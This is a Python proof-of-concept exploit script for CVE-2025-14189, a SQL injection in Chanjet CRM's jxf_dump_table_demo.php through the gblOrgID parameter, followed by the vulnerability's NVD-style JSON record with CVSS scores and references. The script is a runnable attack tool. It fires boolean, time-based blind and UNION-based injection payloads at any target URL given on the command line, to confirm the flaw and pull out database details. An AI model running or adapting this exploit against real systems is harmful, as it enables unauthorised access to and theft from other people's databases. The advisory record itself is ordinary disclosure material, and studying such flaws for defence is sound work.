CVE-2025-14189

import requests import sys # CVE-2025-14189 SQL Injection PoC for Chanjet CRM # Target: /tools/jxf_dump_table_demo.php # Vulnerable Parameter: gblOrgID def exploit_sqli(target_url, payload): """ Exploit SQL injection vulnerability in Chanjet CRM target_url: Base URL of the vulnerable application payload: SQL injection payload for gblOrgID parameter """ target = f"{target_url}/tools/jxf_dump_table_demo.php" params = { 'gblOrgID': payload } try: response = requests.get(target, params=params, timeout=10) return response.text except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None # Blind SQL Injection to extract database version def extract_db_version(target_url): """ Use time-based blind SQL injection to extract database version """ payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1" print(f"[*] Sending payload to extract database info...") result = exploit_sqli(target_url, payload) return result # Example: Extract current user def extract_current_user(target_url): """ Extract current database user using UNION-based injection """ payload = "1' UNION SELECT user(),2,3,4,5-- -" result = exploit_sqli(target_url, payload) return result if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-14189.py <target_url>") print("Example: python cve-2025-14189.py http://target.com") sys.exit(1) target_url = sys.argv[1] print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-14189...") # Test for vulnerability test_payload = "1' OR '1'='1" result = exploit_sqli(target_url, test_payload) if result: print("[+] Target appears to be vulnerable!") else: print("[-] Target may not be vulnerable or is unreachable")

{"cve": {"id": "CVE-2025-14189", "sourceIdentifier": "[email protected]", "published": "2025-12-07T12:15:47.610", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Chanjet CRM up to 20251121. Affected is an unknown function of the file /tools/jxf_dump_table_demo.php. The manipulation of the argument gblOrgID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/hacker-routing/cve/issues/2", "source": "[email protected]"}, {"url": "https://github.com/hacker-routing/cve/issues/2#issue-3646348225", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.334609", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334609", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.699133", "source": "[email protected]"}]}}